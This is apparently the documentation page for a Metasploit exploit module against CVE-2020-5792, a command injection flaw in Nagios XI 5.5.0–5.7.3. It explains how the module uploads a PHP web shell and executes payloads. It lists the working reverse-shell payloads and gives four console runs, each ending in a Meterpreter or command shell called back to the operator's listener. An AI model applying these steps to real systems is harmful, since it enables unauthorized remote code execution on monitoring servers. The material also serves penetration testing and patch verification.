## Vulnerable Application
This module exploits an OS command injection vulnerability (CVE-2020-5792) in `includes/components/nxti/index.php`
that enables an authenticated user with admin privileges to achieve remote code execution as the `apache` user.

The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
obtain the Nagios XI version number, which is then used to check if the target is version 5.5.0-5.7.3 and therefore vulnerable.

Next, the module uploads a simple PHP shell via `includes/components/nxti/index.php` to `includes/components/autodiscovery/jobs/<php_shell>`
and then executes the payload via a HTTP GET request to `includes/components/autodiscovery/jobs/<php_shell>?<php_param>=<cmd>`. This will
will result in the command specified by the attacker, aka `<cmd>`, being executed as the `apache` user.

The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1),
However, the only reliable `cmd/unix` payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be
`cmd/unix/reverse_awk`, `cmd/unix/reverse_perl_ssl` and `cmd/unix/reverse_openssl`.

Valid credentials for a Nagios XI admin user are required.
This module has been successfully tested against Nagios XI 5.7.3 running on CentOS 7.

Vulnerable software for testing is available [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
Detailed installation instructions are available
[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf)
and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I).

## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce`
3. Do: `set RHOSTS [IP]`
4. Do: `set USERNAME [username for the Nagios XI account with administrative privileges]`
5. Do: `set PASSWORD [password for the Nagios XI account with administrative privileges]`
6. Do: `set target [target]`
7. Do: `set payload [payload]`
8. Do: `set LHOST [IP]`
9. Do: `exploit`

## Options
### FINISH_INSTALL
If this is set to `true`, the module will try to finish installing Nagios XI on targets where the installation has not been completed.
This includes signing the license agreement. The default value is `false`.
### PASSWORD
The password for the Nagios XI account to authenticate with.
### TARGETURI
The base path to Nagios XI. The default value is `/nagiosxi/`.
### USERNAME
The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.

## Targets
```
Id  Name
--  ----
0   Linux (x86/x64)
1   CMD
```

## Scenarios
### Nagios XI 5.7.3 running on CentOS 7 - Linux target
```
msf > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set rhosts 192.168.1.16
rhosts => 192.168.1.16
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set password nagiosadmin
password => nagiosadmin
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so.
                                              This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux (x86/x64)


msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/yRzLEtzVyAm.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/yRzLEtzVyAm.php?i=<cmd>`
[*] Sending stage (980808 bytes) to 192.168.1.16
[*] Command Stager progress - 100.00% done (773/773 bytes)
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/yRzLEtzVyAm.php
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.16:54824) at 2021-04-01 12:36:52 -0400

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
```
### Nagios XI 5.7.3 running on CentOS 7 - CMD target
```
msf > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set rhosts 192.168.1.16
rhosts => 192.168.1.16
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set password nagiosadmin
password => nagiosadmin
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set target 1
target => 1
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_awk):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   CMD


msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/WwsImAkDSM.php
[*] Attempting to execute the payload via `/nagiosxi/includes/components/autodiscovery/jobs/WwsImAkDSM.php?h=<cmd>`
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/WwsImAkDSM.php
[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.16:43831) at 2021-04-01 12:37:29 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
```

### Nagios XI 5.6.5 running on CentOS 7 - Linux Target
```
msf > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set FINISH_INSTALL true
FINISH_INSTALL => true
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set LHOST 172.21.163.243
LHOST => 172.21.163.243
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set RHOSTS 172.21.168.44
RHOSTS => 172.21.168.44
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > check

[*] Attempting to authenticate to Nagios XI...
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
[*] Attempting to authenticate to Nagios XI...
[!] No response received from the server. This can happen after installing Nagios XI or signing the license agreement
[*] The module will wait for 5 seconds and retry.
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[*] Attempting to sign the Nagios XI license agreement...
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[*] 172.21.168.44:80 - The target appears to be vulnerable.
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > exploit

[*] Started reverse TCP handler on 172.21.163.243:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/KBRRRebd.php
[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/KBRRRebd.php?z=<cmd>`
[*] Sending stage (980808 bytes) to 172.21.168.44
[*] Command Stager progress - 100.00% done (773/773 bytes)
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/KBRRRebd.php
[*] Meterpreter session 1 opened (172.21.163.243:4444 -> 172.21.168.44:35554) at 2021-04-20 13:52:24 -0500

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > pwd
/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.21.168.44 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  true             no        If the Nagios XI installation has not been completed, try to do so. This includes s
                                              igning the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          172.21.168.44    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
                                              cal machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.21.163.243   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux (x86/x64)


msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) >
```

### Nagios XI 5.6.5 running on CentOS 7 - CMD Target
```
msf > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set FINISH_INSTALL true
FINISH_INSTALL => true
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set LHOST 172.21.163.243
LHOST => 172.21.163.243
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set RHOSTS 172.21.168.44
RHOSTS => 172.21.168.44
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > check

[*] Attempting to authenticate to Nagios XI...
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
[*] Attempting to authenticate to Nagios XI...
[!] No response received from the server. This can happen after installing Nagios XI or signing the license agreement
[*] The module will wait for 5 seconds and retry.
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[*] Attempting to sign the Nagios XI license agreement...
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[*] 172.21.168.44:80 - The target appears to be vulnerable.
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set TARGET 1
TARGET => 1
msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  true             no        If the Nagios XI installation has not been completed, try to do so. This includes s
                                              igning the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          172.21.168.44    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
                                              cal machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_awk):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.21.163.243   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   CMD


msf exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > exploit

[*] Started reverse TCP handler on 172.21.163.243:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.5
[+] The target appears to be vulnerable.
[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/lZrKJcDOtsT.php
[*] Attempting to execute the payload via `/nagiosxi/includes/components/autodiscovery/jobs/lZrKJcDOtsT.php?v=<cmd>`
[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/lZrKJcDOtsT.php
[*] Command shell session 2 opened (172.21.163.243:4444 -> 172.21.168.44:40205) at 2021-04-20 13:57:48 -0500

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd) context=system_u:system_r:httpd_t:s0
whoami
apache
```
